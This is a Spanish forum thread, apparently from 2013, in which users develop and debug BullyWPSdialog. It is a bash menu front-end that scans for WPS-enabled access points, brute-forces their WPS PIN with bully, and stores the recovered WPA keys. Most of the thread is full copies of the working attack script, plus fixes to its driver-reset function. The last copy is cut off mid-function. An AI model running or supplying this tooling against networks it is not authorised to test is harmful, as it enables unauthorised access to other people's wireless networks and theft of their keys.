Autor Tema: BullyWPSdialog v1.0 - Interface dialog para auditar WPS con bully  (Leído 50103 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 14715
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #40 en: 25-09-2013, 16:13 (Miércoles) »
una especie de "driver filter" podría hacerse así:
Código: [Seleccionar]
case "$DRIVER" in


  ath9k)
  # aqui las transformaciones necesarias para el caso del driver ath9k
  # por ejemplo:
  DRIVER="ath9k_htc"
  ;;


  rtl8139se, rtl8139ce, rtl8139su, rtl8139blablabla)
  # aqui las transformaciones necesarias para el caso drivers diversos de realtek
  DRIVER="rtlwifi" # es un poco bestia, pero es un ejemplo
  ;;


  *)
  # aqui el codigo referente a casos que no encajan en ninguno de los anteriores
  blah=blah
  ;;


esac



no se nada de bash asi que me quedo exactamente igual.



Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 14715
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #41 en: 25-09-2013, 16:17 (Miércoles) »
bueno ya esta..

Código: [Seleccionar]
#!/bin/bash

DRIVER="$(basename "$(ls -l "/sys/class/net/wlan1/device/driver")")"

case "$DRIVER" in
  ath9k_htc)
  DRIVER="ath9k"
  ;;
esac

echo "$DRIVER"

eso me devuelve

DRIVER=ath9k


osea el padre , voy a meterlo al script y probar.


el caso de las realtek creo que ni fu ni fa por que todas usan el mismo driver y no hay subdrivers , por llamarlo de alguna forma

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 14715
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #42 en: 25-09-2013, 16:20 (Miércoles) »
SOLVED   >:(


Código: [Seleccionar]
# Función que desmonta y vuelve a montar el driver de la interface seleccionada
reset_iface() {

if [ "$INTERFACE" ]; then
DRIVER="$(basename "$(ls -l "/sys/class/net/$INTERFACE/device/driver")")"
case "$DRIVER" in
        ath9k_htc)
        DRIVER="ath9k"
        ;;
        esac
rmmod -f "$DRIVER"       >/dev/null 2>&1
modprobe "$DRIVER"       >/dev/null 2>&1
ifconfig "$INTERFACE" up >/dev/null 2>&1
fi

}


veo que ya se habia retocado esa funcion por otro asunto ..asi que os dejo la 0.8 , que es la 0.7  pero con la funcion de detectar driver funcional para atheros usb que usen ath9k_htc


VERSION 0.8

Código: [Seleccionar]
#!/bin/bash

# VERSION 0.1  12/09/2013
# -----------------------
# - Fecha de salida
#
# VERSION 0.2  12/09/2013
# -----------------------
# - Solucionado bug con ESSIDs que contengan espacios (Warcry)
#
# VERSION 0.3  13/09/2013
# -----------------------
# - Añadido parametro -N para que las ralink no fallen. (USUARIONUEVO)
#
# VERSION 0.4  13/09/2013
# -----------------------
# - Añadido parametro -F para evitar warnings si cambiamos de ataque secuencial a random o viceversa.
#  (USUARIONUEVO)
#
# VERSION 0.5  19/09/2013
# -----------------------
# - Añadido parámetro -hold para que no se cierre la xterm en caso de que se produzca algún error.
# - Solucionado problema que impedía leer la clave WPA del log de bully.
# - Se sustituye la función de desmontar interfaces en modo monitor por la de desmontar y volver
#   a montar el driver de la interface (es mas efectivo).
# - Ahora al seleccionar objetivo, se comprueba si la clave ya se ha obtenido anteriormente y
#   en caso afirmativo, se muestra la clave junto con la información del objetivo.
#
# VERSION 0.6  24/09/2013
# -----------------------
# - Modificada funciona de reseteo de interface para añadir al final un ifconfig up
# - Ahora se "resetea" la interface también al salir del script.
#
# VERSION 0.7  24/09/2013
# -----------------------
# - Solucionado bug que probocaba que se quedara el PIN "fijado"
#   en el ataque de fuerza bruta habiendo realizado anteriormente
#   un ataque introduciendo un PIN especifico.
# - Solucionado un error ortográfico.
#
# VERSION 0.8  24/09/2013
# -----------------------
# -Retocada funcion de detectar driver por problemas con ath9K_htc


# Variables globales
SCRIPT="BullyWPSdialog"
VERSION="0.8 Beta"
BACKTITLE="$SCRIPT $VERSION - By geminis_demon - SeguridadWireless.Net"
TMP="/tmp/$SCRIPT"
KEYS="$HOME/swireless/$SCRIPT/Keys"

# Función que obtiene PIN y clave WPA del log de bully
obtener_clave_wpa() {

# En caso de que el retun de bully no sea 0, de da por echo que no se ha obtenido la clave
if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]').run"|grep "signal 0$")" ]; then

# Se parsea el log de bully para obtener el PIN y la clave WPA
WPS_PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]').run"|tr ':' ' '|awk '{print $2}')"
CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]').run"|tr ':' ' '|awk '{print $4}')"

# Si el BSSID objetivo cumple con el CheckSum,
# este se calcula para saber cual es el último dígito del PIN
# (ya podría venir el PIN completo en el log de bully ¬¬)
if [ ! "$NO_CHECKSUM" ]; then
WPS_PIN=$(echo $WPS_PIN|cut -b 1,2,3,4,5,6,7)
pin=$WPS_PIN
wps_pin_checksum
WPS_PIN=$WPS_PIN$PIN_p2
fi
else
WPS_PIN=""
CLAVE_WPA=""
fi

}

# Función que desmonta y vuelve a montar el driver de la interface seleccionada
reset_iface() {

if [ "$INTERFACE" ]; then
DRIVER="$(basename "$(ls -l "/sys/class/net/$INTERFACE/device/driver")")"
case "$DRIVER" in
        ath9k_htc)
        DRIVER="ath9k"
        ;;
        esac
rmmod -f "$DRIVER"       >/dev/null 2>&1
modprobe "$DRIVER"       >/dev/null 2>&1
ifconfig "$INTERFACE" up >/dev/null 2>&1
fi

}

# Función comprobar si la interface está asociada a un punto de acceso
comprobacion_interface_asociada() {

# Si la interface está asociada, no se puede continuar
if [ ! "$(iwconfig $INTERFACE|grep "Not-Associated")" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " NO SE PUEDE CONTINUAR " \
      --ok-label "Salir" \
      --msgbox "\nPara evitar errores, la interface $INTERFACE \
               no debe estar asociada a un punto de acceso.\n " 0 0
exit 1
fi
}

# Función salvar clave WPA
salvar_clave_wpa() {

# Si no se ha obtenido la clave WPA, informamos de ello y volvemos al menú
if [ ! "$CLAVE_WPA" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " PROCESO COMPLETADO " \
      --ok-label "Volver al menú" \
      --msgbox "\nNo ha sido posible obtener la clave WPA\n " 0 0
     
# Si dialog no devuelve el valor 0, salimos
if [ $? != 0 ]; then
reset_iface; exit 1
fi

menu --InfoAP
fi

# Si existe la ruta $KEYS y no es un directorio se elimina
if [ -e "$KEYS" ] && [ ! -d "$KEYS" ]; then rm -rf "$KEYS"; fi

# Si no existe la ruta $KEYS la creamos
if [ ! -d "$KEYS" ]; then mkdir -p "$KEYS"; fi

# Salvamos la clave en un archivo de texto
NOMBRE="$ESSID_$(echo "$BSSID"|tr ':' '-')"
cat << EOF >"$TMP/$NOMBRE.key"
    ESSID: $ESSID
    BSSID: $BSSID
  PIN WPS: $WPS_PIN
CLAVE WPA: $CLAVE_WPA
EOF

# Convertimos el texto a formato windows
cat "$TMP/$NOMBRE.key"|sed -e 's/$/\r/' >"$KEYS/$NOMBRE.txt"

# Diálogo que informa donde se ha guardado la clave WPA
dialog --backtitle "$BACKTITLE" \
       --title " PROCESO COMPLETADO " \
       --ok-label "Volver al menú" \
       --msgbox "\n¡Se han obtenido con exito clave WPA! \
                \nLa clave ha sido guardada en: \n\n$KEYS/$NOMBRE.txt" 0 0

# Saltamos al menú principal
menu --InfoAP --InfoWPA
}

# Función lanzar ataque de fuerza bruta con bully
bully_wps() {

# Se comprueba que la interface no esté asociada
comprobacion_interface_asociada

# Si no se ha seleccionado ningún objetivo no se puede continuar
if [ ! "$ESSID" -o ! "$BSSID" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " NO SE PUEDE CONTINUAR " \
      --ok-label "Volver al menú" \
      --msgbox "\nNo se ha seleccionado ningún objetivo\n " 0 0
menu
fi

# Si el BSSID corresponde con 8C:0C:A3, el PIN no cumple con el CheckSum
if [ "$(echo "$BSSID"|cut -d':' -f1,2,3)" = "8C:0C:A3" ]; then
NO_CHECKSUM="-B"
LONGITUD_PIN="8"
else
NO_CHECKSUM=""
LONGITUD_PIN="7"
fi

# Si se ha elejido la opción de introducir PIN manualmente, mostramos el diálogo para introducir el pin
if [ "$1" = "--Pin" -o "$2" = "--Pin" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " INTRODUCIR PIN MANUALMENTE " \
      --cancel-label "Volver al menú" \
      --max-input "$LONGITUD_PIN" \
      --inputbox "\nIn troduce el PIN con un máximo de $LONGITUD_PIN dígitos:" 0 0 \
2>"$TMP/PIN_WPS.txt"

# Si el comando anterior no devuelve el valor 0, volvemos al menú
if [ ! $? = 0 ]; then menu; fi

# Si no se intruduce un valor numérico, no se puede continuar
if [ ! "$(cat "$TMP/PIN_WPS.txt"|grep "^[0-9]*$")" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " ERROR " \
      --msgbox "\nDebes introducir un valor numérico\n " 0 0
bully_wps --InfoAP --Pin
fi

# Guardamos en una variable el PIN junto con los parámetros para bully
PIN_WPS="-S -p $(cat "$TMP/PIN_WPS.txt")"
else
PIN_WPS=""
fi

# Lanzamos ataque con bully
xterm  -hold -fg FloralWhite -bg DarkBlue -T "Bully -> $ESSID" -e \
bully -F -b $BSSID -c $CANAL -v 3 $PIN_WPS $NO_CHECKSUM -N $INTERFACE_MON & BULLY_PID=$!

# Diálogo que aparecerá mientras se ejecuta el ataque
dialog --backtitle "$BACKTITLE" \
       --infobox "$INFO_AP\nSe ha puesto en marcha el ataque con bully,
                 presiona \"Control+C\" para detener el proceso.\n " 16 49
      
# Si se presiona "Control+C", se detiene el proceso de bully
trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT

# Mientras el proceso de bully esté activo, el script estrá "durmiendo"
while [ -e "/proc/$BULLY_PID" ]; do
sleep 2
done

# Obtenemos el PIN y clave WPA
obtener_clave_wpa

# Salvamos PIN y clave en un archivo
salvar_clave_wpa

}

# Función seleccionar objetivo
seleccionar_objetivo() {

# Si no se encuentran objetivos, no se puede continuar
if [ ! "$(cat "$TMP/wash_scan.txt")" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " NO SE PUEDE CONTINUAR " \
      --ok-label "Volver al menú" \
      --msgbox "\nNo se ha encontrado ningún objetivo con WPS activado.\n " 0 0
menu
fi

# Creamos el menú para seleccionar objetivo
N=1
cat "$TMP/wash_scan.txt"|while read MAC CANAL PWR VER LOCK ESSID; do
if [ "$LOCK" = "Yes" ]; then LOCK="Si"; fi
echo "\"$N)\" \"$MAC    $LOCK       $CANAL     $(($PWR+100))    $ESSID\" \\"
N=$(($N+1))
done >"$TMP/menu_objetivos.txt"

# Diálogo para seleccionar objetivo
dialog --backtitle "$BACKTITLE" \
       --title " SELECCIONAR OBJETIVO " \
       --cancel-label "Volver al menú" \
       --menu "\n              BSSID        Locked   Canal   PWR    ESSID" 0 0 0 \
       --file "$TMP/menu_objetivos.txt" \
2>"$TMP/seleccion.txt"

# Si el comando anterior no devuelve el valor 0, volvemos al menú
if [ ! $? = 0 ]; then menu; fi

# Definimos los parámetros que se le pasarán a bully
SELECCION=$(cat "$TMP/seleccion.txt")
ESSID="$(cat "$TMP/menu_objetivos.txt"|tr -d '"'|tr -d '\\'|grep "^$SELECCION"|cut -d' ' -f22-)"
BSSID="$(cat "$TMP/menu_objetivos.txt"|tr -d '"'|tr -d '\\'|grep "^$SELECCION"|awk '{print $2}')"
CANAL="$(cat "$TMP/menu_objetivos.txt"|tr -d '"'|tr -d '\\'|grep "^$SELECCION"|awk '{print $4}')"

# Comprobamos si la clave ya ha sido obtenida anteriormente
if [ -e "$KEYS/$(echo "$BSSID"|tr ':' '-').txt" ]; then
WPS_PIN="$(cat "$KEYS/$(echo "$BSSID"|tr ':' '-').txt"|grep "PIN WPS:"|awk '{print $3}')"
CLAVE_WPA="$(cat "$KEYS/$(echo "$BSSID"|tr ':' '-').txt"|grep "CLAVE WPA:"|awk '{print $3}')"
else
obtener_clave_wpa
fi

# Si la clave ya ha diso obtenida anteriormente, la mostramos en el menú,
# en caso contrario mostramos solo la información básica
if [ "$CLAVE_WPA" ]; then
menu --InfoAP --InfoWPA
else
menu --InfoAP
fi
}

# Función escanear con wash en busca de objetivos con WPS activado
escanear_wps() {

# Se comprueba que la interface no esté asociada
comprobacion_interface_asociada

# Diálogo para introducir tiempo a escanear
dialog --backtitle "$BACKTITLE" \
       --title " ESCANEAR EN BUSCA DE OBJETIVOS " \
       --cancel-label "Volver al menú" \
       --max-input "2" \
       --inputbox "\nIntroduce el tiempo a escanear en segundos: \n " 0 0 \
2>"$TMP/segundos.txt"

# Si el comando anterior no devuelve el valor 0, volvemos al menú
if [ ! $? = 0 ]; then menu; fi

# Si no se introduce un valor numérico, no se puede continuar
if [ ! "$(cat "$TMP/segundos.txt"|grep "^[0-9]*$")" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " ERROR " \
      --msgbox "\nDebes introducir un valor numérico\n " 0 0
escanear_wps
fi

# Matámos proceso de wash para evitar conflictos
killall wash >/dev/null 2>&1

# Escaneamos con wash
wash -i $INTERFACE_MON -C -D 2>/dev/null|tail -n +3|grep -v "^$" >"$TMP/wash_scan.txt" &

# Diálogo que muestra barra de progreso mientras se escanea
N2=$(cat "$TMP/segundos.txt")
N1=1
while [ ! $(($N1-1)) -eq $N2 ]; do
PORCENT=$(($(($N1*100))/$N2))
echo $PORCENT
sleep 1
N1=$(($N1+1))
done|\
dialog --backtitle "$BACKTITLE" \
       --title " ESCANEANDO EN BUSCA DE OBJETIVOS " \
       --gauge "" 0 0 \
2>/dev/null

# Cuando pasa el tiempo programado, terminamos el rpoceso de wash
killall wash >/dev/null 2>&1
sleep 1

# Saltamos a la funcion seleccionar objetivo
seleccionar_objetivo
}

# Función seleccionar interface y poner en modo monitor
seleccionar_interface() {

# Si no se encuentra ninguna tarjeta wifi, no se puede continuar
if [ ! "$(iwconfig 2>/dev/null|cut -d' ' -f1|grep -v "^$")" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " NO SE PUEDE CONTINUAR " \
               --ok-label "Salir" \
               --msgbox "\nNo se ha detectado ninguna tarjeta wifi en este equipo.\n " 0 0
exit 1
fi

# Creamos el menú para seleccionar la interface
N=1
airmon-ng 2>/dev/null|egrep -v "^Interface|^$"|cut -d'-' -f1|\
while read INTERFACE CHIPSET MODELO DRIVER; do
if [ "$(iwconfig 2>/dev/null|grep "^$INTERFACE"|grep -v "Mode:Monitor")" ]; then
echo "\"$N\" \"$INTERFACE       $CHIPSET $MODELO      $DRIVER\" \\"
N=$(($N+1))
fi
done >"$TMP/menu_interfaces.txt"

# Diálogo para seleccionar interface
dialog --backtitle "$BACKTITLE" \
       --title " SELECCIONAR INTERFACE " \
       --cancel-label "Salir" \
       --menu "\n       Interface   Chipset            Driver" 0 0 0 \
       --file "$TMP/menu_interfaces.txt" \
2>"$TMP/seleccion.txt"

# Si dialog no devuelve el valor 0, salimos.
if [ ! $? = 0 ]; then exit 1; fi

SELECCION="$(cat "$TMP/seleccion.txt")"
INTERFACE="$(cat "$TMP/menu_interfaces.txt"|tr -d '"'|tr -d '\\'|grep ^$SELECCION|awk '{print $2}')"

# Se comprueba que la interface no esté asociada
comprobacion_interface_asociada

# Se reinicia el driver de la interface seleccionada para evitar conflictos
reset_iface

# Ponemos la interface seleccionada en modo monitor
airmon-ng start $INTERFACE >"$TMP/log_airmon-ng.txt" 2>&1

# Si hay algún error al poner la interface en modo monitor no se puede continuar
if [ ! $? = 0 ]; then
dialog --backtitle "$BACKTITLE" \
               --title " ERROR " \
               --ok-label "Salir" \
               --textbox "$TMP/log_airmon-ng.txt" 0 0
        reset_iface; exit 1
fi

# Definimos interface en modo monitor
INTERFACE_MON="$(cat "$TMP/log_airmon-ng.txt"|grep "monitor mode enabled"|tr -d ')'|awk '{print $5}')"

dialog --backtitle "$BACKTITLE" \
       --infobox "\nSe utilizará $INTERFACE_MON en modo monitor\n " 0 0
sleep 3

# Saltámos al menú principal
menu
}

# Yeah Niroz was here, computePIN by ZaoChunsheng, C portado a bash
wps_pin_checksum() {
  acum=0
  PIN_p2=0

  while [ $pin -gt 0 ]; do
    acum=$(($acum + (3 * ($pin % 10))))
    pin=$(($pin / 10))
    acum=$(($acum + ($pin % 10)))
    pin=$(($pin / 10))
  done

  result=$(((10 - ($acum % 10)) % 10))
  PIN_p2=$(($result % 10000000))
}

# Función menú principal
menu() {

# Información del objetivo
INFO_AP="
$(if [ "$1" = "--InfoAP" ]; then
echo "\n\n        INFORMACIÓN DEL OBJETIVO\n"
echo "   ************************************  \n"
echo "      ESSID: $ESSID\n"
echo "      BSSID: $BSSID\n"
echo "      Canál: $CANAL\n"
if [ "$2" = "--InfoWPA" ]; then
echo "    PIN WPS: $WPS_PIN\n"
echo "  Clave WPA: $CLAVE_WPA\n"
echo "   ************************************  \n\n"
else
echo "   ************************************  \n\n"
fi
fi)"

# Diálogo con opciones del menú principal
dialog --backtitle "$BACKTITLE" \
       --title " MENU PRINCIPAL " \
       --cancel-label "Salir" \
       --menu "$INFO_AP\nSelecciona una opción:" 0 0 0 \
     "1)" "Escanear en busca de objetivos" \
     "2)" "Comenzar ataque de fuerza bruta" \
     "3)" "Probar un PIN específico" \
     "4)" "Seleccionar otro objetivo" \
2>"$TMP/seleccion.txt"

# Si dialog no devuelve el valor 0, salimos
if [ ! $? = 0 ]; then reset_iface; exit 1; fi

# Dependiendo de la opción elegida, se llama a la función correspondiente
case $(cat "$TMP/seleccion.txt"|tr -d ')') in
1 ) escanear_wps;;
2 ) bully_wps --InfoAP;;
3 ) bully_wps --InfoAP --Pin;;
4 ) seleccionar_objetivo;;
esac
}

# Si existe la ruta $TMP y no es un directorio se elimina
if [ -e "$TMP" ] && [ ! -d "$TMP" ]; then rm -rf "$TMP"; fi

# Si no existe la ruta $TMP la creamos
if [ ! -d "$TMP" ]; then mkdir -p "$TMP"; fi

# Comienza el script seleccionando la interface
seleccionar_interface
« Última modificación: 25-09-2013, 16:36 (Miércoles) por USUARIONUEVO »

alist3r

  • Visitante
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #43 en: 25-09-2013, 16:30 (Miércoles) »
pues listo.

los rtl usan un modulo biblioteca llamado rtlwifi, pero me extrañaria mucho que tuvieras que desinstanciarlo. todos los dispositivos tienen drivers especificos que, aunque cuelguen del primero, son suficientes en caso de que se necesite un "full reset" del adaptador.

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 14715
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #44 en: 25-09-2013, 16:35 (Miércoles) »
pues listo.

los rtl usan un modulo biblioteca llamado rtlwifi, pero me extrañaria mucho que tuvieras que desinstanciarlo. todos los dispositivos tienen drivers especificos que, aunque cuelguen del primero, son suficientes en caso de que se necesite un "full reset" del adaptador.

si salen mas casos se hiran viendo.


gracias por tu ayudita  >:(

alist3r

  • Visitante
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #45 en: 25-09-2013, 16:56 (Miércoles) »
wellcome!
proxima tarea, parchear el 3.9, que lo tengo ahi colgao. hacer backports es un rollazo xD

Desconectado geminis_demon

  • Colaborador
  • *
  • Mensajes: 2377
  • Prácticas precisas precisan práctica
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #46 en: 25-09-2013, 20:49 (Miércoles) »
Bueno ya veo que habéis dado con el problema, gracias a los dos  ;)

Yo también he estado haciendo los deberes  >:D

He estado indagando en el código de airmon-ng, y resulta que ellos ya se habían dado cuenta de ese problema y lo tenían solucionado, y no solo pasa con las ath9k, también con las ath5k.

A parte de eso, también hay otro problema a la ora de detectar el driver "WiLink".

He añadido todos eso parches a la función reset_iface, y al final ha quedado así:

Código: [Seleccionar]
# Función que desmonta y vuelve a montar el driver de la interface seleccionada
reset_iface() {

if [ "$INTERFACE" ]; then

# Identificamos el driver de la interface seleccionada
DRIVER="$(basename "$(ls -l "/sys/class/net/$INTERFACE/device/driver")")"
if [ "$(echo "$DRIVER"|grep "ath9k")" ]; then
DRIVER="ath9k"
elif [ "$(echo "$DRIVER"|grep "ath5k")" ]; then
DRIVER="ath5k"
elif [ ! "$DRIVER" ] && [ -d "/sys/class/net/tiwlan0/wireless" ]; then
DRIVER="WiLink"
fi

# Se desmonta y se vuelve a montar el driver
rmmod -f "$DRIVER"       >/dev/null 2>&1
modprobe "$DRIVER"       >/dev/null 2>&1

# Se pone la interface "up" para evitar problemas
# con algunos adaptadores inalámbricos
ifconfig "$INTERFACE" up >/dev/null 2>&1
fi

Ya he puesto la versión 0.8 en el post principal con la función parcheada  ;)
« Última modificación: 25-09-2013, 20:55 (Miércoles) por geminis_demon »

La luz cree que viaja más rápido que cualquier otra cosa, pero se equivoca; da lo mismo lo rápido que pueda viajar, porque al final, la luz descubre que la oscuridad ha llegado antes que ella, y la está esperando.

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 14715
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #47 en: 26-09-2013, 09:49 (Jueves) »
Bien , ... pues resulta que estamos IGUAL O PEOR que antes.


Cuando el driver es ath9k_htc , hay que resetear 2


ath9k & ath9k_htc


me di cuenta de que no estaba funcionando por que el numero de interfaces monitor no para de aumentar y cuando tumbamos el driver se supone que caen todas ...y no es asi , por lo que el driver no se esta desmontando.  :'(


Al final veras tu , que lo mas comodo el el down/up y a correr.

cond-e

  • Visitante
Re: Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #48 en: 26-09-2013, 09:52 (Jueves) »
Ami me pasa ke lanzo el script y monta la tarjeta wifistation ext en modo monitor pero dice ke no detecta redes pruevo a montar aparte la tarjeta en modo monitor y el script al iniciar la desmonta y sigue sin detectar redes:-\

Enviado desde mi GT-I9100 usando Tapatalk 2

Desconectado geminis_demon

  • Colaborador
  • *
  • Mensajes: 2377
  • Prácticas precisas precisan práctica
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #49 en: 26-09-2013, 10:14 (Jueves) »
Al final veras tu , que lo mas comodo el el down/up y a correr.

No hay que tirar la toalla tan pronto hombre.. en esta vida todo tiene solución menos la muerte  >:D

Prueba esto cuando puedas:

Código: [Seleccionar]
#!/bin/bash

# VERSION 0.1  12/09/2013
# -----------------------
# - Fecha de salida
#
# VERSION 0.2  12/09/2013
# -----------------------
# - Solucionado bug con ESSIDs que contengan espacios (Warcry)
#
# VERSION 0.3  13/09/2013
# -----------------------
# - Añadido parametro -N para que las ralink no fallen. (USUARIONUEVO)
#
# VERSION 0.4  13/09/2013
# -----------------------
# - Añadido parametro -F para evitar warnings si cambiamos de ataque secuencial a random o viceversa.
#  (USUARIONUEVO)
#
# VERSION 0.5  19/09/2013
# -----------------------
# - Añadido parámetro -hold para que no se cierre la xterm en caso de que se produzca algún error.
# - Solucionado problema que impedía leer la clave WPA del log de bully.
# - Se sustituye la función de desmontar interfaces en modo monitor por la de desmontar y volver
#   a montar el driver de la interface (es mas efectivo).
# - Ahora al seleccionar objetivo, se comprueba si la clave ya se ha obtenido anteriormente y
#   en caso afirmativo, se muestra la clave junto con la información del objetivo.
#
# VERSION 0.6  24/09/2013
# -----------------------
# - Modificada funciona de reseteo de interface para añadir al final un ifconfig up
# - Ahora se "resetea" la interface también al salir del script.
#
# VERSION 0.7  24/09/2013
# -----------------------
# - Solucionado bug que probocaba que se quedara el PIN "fijado"
#   en el ataque de fuerza bruta habiendo realizado anteriormente
#   un ataque introduciendo un PIN especifico.
# - Solucionado un error ortográfico.
#
# VERSION 0.8  25/09/2013
# -----------------------
# - Mejorada la función de detectar driver ya que no identificaba correctamnete
#   los drivers ath5k, ath9k y WiLink.



# Variables globales
SCRIPT="BullyWPSdialog"
VERSION="0.8.1 Beta"
BACKTITLE="$SCRIPT $VERSION - By geminis_demon - SeguridadWireless.Net"
TMP="/tmp/$SCRIPT"
KEYS="$HOME/swireless/$SCRIPT/Keys"

# Función que obtiene PIN y clave WPA del log de bully
obtener_clave_wpa() {

# En caso de que el retun de bully no sea 0, de da por echo que no se ha obtenido la clave
if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]').run"|grep "signal 0$")" ]; then

# Se parsea el log de bully para obtener el PIN y la clave WPA
WPS_PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]').run"|tr ':' ' '|awk '{print $2}')"
CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]').run"|tr ':' ' '|awk '{print $4}')"

# Si el BSSID objetivo cumple con el CheckSum,
# este se calcula para saber cual es el último dígito del PIN
# (ya podría venir el PIN completo en el log de bully ¬¬)
if [ ! "$NO_CHECKSUM" ]; then
WPS_PIN=$(echo $WPS_PIN|cut -b 1,2,3,4,5,6,7)
pin=$WPS_PIN
wps_pin_checksum
WPS_PIN=$WPS_PIN$PIN_p2
fi
else
WPS_PIN=""
CLAVE_WPA=""
fi

}

# Función que desmonta y vuelve a montar el driver de la interface seleccionada
reset_iface() {

if [ "$INTERFACE" ]; then

# Identificamos el driver de la interface seleccionada
DRIVER="$(basename "$(ls -l "/sys/class/net/$INTERFACE/device/driver")")"
if [ "$(echo "$DRIVER"|grep "ath9k")" ]; then
DRIVER="ath9k $DRIVER"
elif [ "$(echo "$DRIVER"|grep "ath5k")" ]; then
DRIVER="ath5k $DRIVER"
elif [ ! "$DRIVER" ] && [ -d "/sys/class/net/tiwlan0/wireless" ]; then
DRIVER="WiLink"
fi

# Se desmonta y se vuelve a montar el driver
for X in $DRIVER; do
rmmod -f "$X"       >/dev/null 2>&1
done
for X in $DRIVER; do
modprobe "$X"       >/dev/null 2>&1
done

# Se pone la interface "up" para evitar problemas
# con algunos adaptadores inalámbricos
ifconfig "$INTERFACE" up >/dev/null 2>&1
fi

}

# Función comprobar si la interface está asociada a un punto de acceso
comprobacion_interface_asociada() {

# Si la interface está asociada, no se puede continuar
if [ ! "$(iwconfig $INTERFACE|grep "Not-Associated")" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " NO SE PUEDE CONTINUAR " \
      --ok-label "Salir" \
      --msgbox "\nPara evitar errores, la interface $INTERFACE \
               no debe estar asociada a un punto de acceso.\n " 0 0
exit 1
fi
}

# Función salvar clave WPA
salvar_clave_wpa() {

# Si no se ha obtenido la clave WPA, informamos de ello y volvemos al menú
if [ ! "$CLAVE_WPA" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " PROCESO COMPLETADO " \
      --ok-label "Volver al menú" \
      --msgbox "\nNo ha sido posible obtener la clave WPA\n " 0 0
     
# Si dialog no devuelve el valor 0, salimos
if [ $? != 0 ]; then
reset_iface; exit 1
fi

menu --InfoAP
fi

# Si existe la ruta $KEYS y no es un directorio se elimina
if [ -e "$KEYS" ] && [ ! -d "$KEYS" ]; then rm -rf "$KEYS"; fi

# Si no existe la ruta $KEYS la creamos
if [ ! -d "$KEYS" ]; then mkdir -p "$KEYS"; fi

# Salvamos la clave en un archivo de texto
NOMBRE="$ESSID_$(echo "$BSSID"|tr ':' '-')"
cat << EOF >"$TMP/$NOMBRE.key"
    ESSID: $ESSID
    BSSID: $BSSID
  PIN WPS: $WPS_PIN
CLAVE WPA: $CLAVE_WPA
EOF

# Convertimos el texto a formato windows
cat "$TMP/$NOMBRE.key"|sed -e 's/$/\r/' >"$KEYS/$NOMBRE.txt"

# Diálogo que informa donde se ha guardado la clave WPA
dialog --backtitle "$BACKTITLE" \
       --title " PROCESO COMPLETADO " \
       --ok-label "Volver al menú" \
       --msgbox "\n¡Se han obtenido con exito clave WPA! \
                \nLa clave ha sido guardada en: \n\n$KEYS/$NOMBRE.txt" 0 0

# Saltamos al menú principal
menu --InfoAP --InfoWPA
}

# Función lanzar ataque de fuerza bruta con bully
bully_wps() {

# Se comprueba que la interface no esté asociada
comprobacion_interface_asociada

# Si no se ha seleccionado ningún objetivo no se puede continuar
if [ ! "$ESSID" -o ! "$BSSID" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " NO SE PUEDE CONTINUAR " \
      --ok-label "Volver al menú" \
      --msgbox "\nNo se ha seleccionado ningún objetivo\n " 0 0
menu
fi

# Si el BSSID corresponde con 8C:0C:A3, el PIN no cumple con el CheckSum
if [ "$(echo "$BSSID"|cut -d':' -f1,2,3)" = "8C:0C:A3" ]; then
NO_CHECKSUM="-B"
LONGITUD_PIN="8"
else
NO_CHECKSUM=""
LONGITUD_PIN="7"
fi

# Si se ha elejido la opción de introducir PIN manualmente, mostramos el diálogo para introducir el pin
if [ "$1" = "--Pin" -o "$2" = "--Pin" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " INTRODUCIR PIN MANUALMENTE " \
      --cancel-label "Volver al menú" \
      --max-input "$LONGITUD_PIN" \
      --inputbox "\nIn troduce el PIN con un máximo de $LONGITUD_PIN dígitos:" 0 0 \
2>"$TMP/PIN_WPS.txt"

# Si el comando anterior no devuelve el valor 0, volvemos al menú
if [ ! $? = 0 ]; then menu; fi

# Si no se intruduce un valor numérico, no se puede continuar
if [ ! "$(cat "$TMP/PIN_WPS.txt"|grep "^[0-9]*$")" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " ERROR " \
      --msgbox "\nDebes introducir un valor numérico\n " 0 0
bully_wps --InfoAP --Pin
fi

# Guardamos en una variable el PIN junto con los parámetros para bully
PIN_WPS="-S -p $(cat "$TMP/PIN_WPS.txt")"
else
PIN_WPS=""
fi

# Lanzamos ataque con bully
